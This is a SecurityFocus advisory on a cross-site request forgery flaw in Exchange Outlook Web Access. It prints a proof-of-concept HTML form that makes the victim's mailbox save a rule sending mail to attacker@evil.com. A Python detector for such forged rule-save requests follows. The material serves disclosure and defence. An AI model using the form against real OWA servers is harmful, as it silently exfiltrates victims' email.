Microsoft Exchange Server Outlook Web Access Cross Site Request Forgery Vulnerability

To exploit this issue, an attacker must entice an unsuspecting victim into visiting a malicious webpage.

The following example request is available:

<form name="myform" method="post" enctype="text/plain" action="https://www.example.com/owa/ev.owa?oeh=1&amp;ns=Rule&amp;ev=Save">
<input type="hidden" name='&#60;params&#62;&#60;Id&#62;&#60;/Id&#62;&#60;Name&#62;Test&#60;/Name&#62;&#60;RecpA4&#62;&#60;item&#62;&#60;Rcp DN="attacker@evil.com" EM="attacker@evil.com" RT="SMTP" AO="3"&#62;&#60;/Rcp&#62;&#60;/item&#62;&#60;/RecpA4&#62;&#60;Actions&#62;&#60;item&#62;&#60;rca t="4"&#62;&#60;/rca&#62;&#60;/item&#62;&#60;/Actions&#62;&#60;/params&#62;' value="">
</form>
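The request above has two traits a defender can key on: it is a POST to the ev.owa handler with ns=Rule and ev=Save, and it arrives with a text/plain body from a page that is not OWA. The following check is an added example (not code from SecurityFocus or Microsoft) that flags such rule-save requests in constructed request records; the OWA hostname is taken from the action URL above and the other hostnames and header values are constructed.

```python
from urllib.parse import urlsplit, parse_qs

# Hostname of the OWA front end, taken from the form action on this page.
OWA_HOST = "www.example.com"


def is_suspicious_rule_save(req):
    """Return (flagged, reason) for one request record.

    req is a dict with keys: method, url, headers (header names in any case).
    """
    parts = urlsplit(req["url"])
    if req["method"].upper() != "POST" or not parts.path.lower().endswith("/owa/ev.owa"):
        return False, "not an OWA event-handler POST"
    qs = parse_qs(parts.query)
    if qs.get("ns") != ["Rule"] or qs.get("ev") != ["Save"]:
        return False, "not a rule-save event"
    headers = {k.lower(): v for k, v in req["headers"].items()}
    # A browser request issued by the OWA client itself carries an Origin or
    # Referer on the OWA host; a request forged from another site does not.
    origin = headers.get("origin") or headers.get("referer")
    if not origin:
        return True, "rule save without Origin/Referer"
    origin_host = urlsplit(origin).hostname
    if origin_host != OWA_HOST:
        return True, f"rule save from foreign origin {origin_host}"
    # enctype="text/plain" forms send a text/plain body, which the OWA client
    # never does for this handler; treat it as a forgery indicator.
    if headers.get("content-type", "").split(";")[0].strip() == "text/plain":
        return True, "rule save with text/plain body"
    return False, "same-origin rule save"


def scan(records):
    """Return the reasons for every flagged record in order."""
    return [reason for r in records if (res := is_suspicious_rule_save(r))[0] for reason in [res[1]]]


# Constructed request records: the forged request from this page's form,
# a legitimate same-origin rule save, and an unrelated GET.
SAMPLE_REQUESTS = [
    {"method": "POST", "url": "https://www.example.com/owa/ev.owa?oeh=1&ns=Rule&ev=Save",
     "headers": {"Referer": "http://third-party.invalid/page.html", "Content-Type": "text/plain"}},
    {"method": "POST", "url": "https://www.example.com/owa/ev.owa?oeh=1&ns=Rule&ev=Save",
     "headers": {"Referer": "https://www.example.com/owa/", "Content-Type": "application/x-www-form-urlencoded"}},
    {"method": "GET", "url": "https://www.example.com/owa/", "headers": {}},
]

if __name__ == "__main__":
    for reason in scan(SAMPLE_REQUESTS):
        print("flagged:", reason)
```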
Copyright 2010, SecurityFocus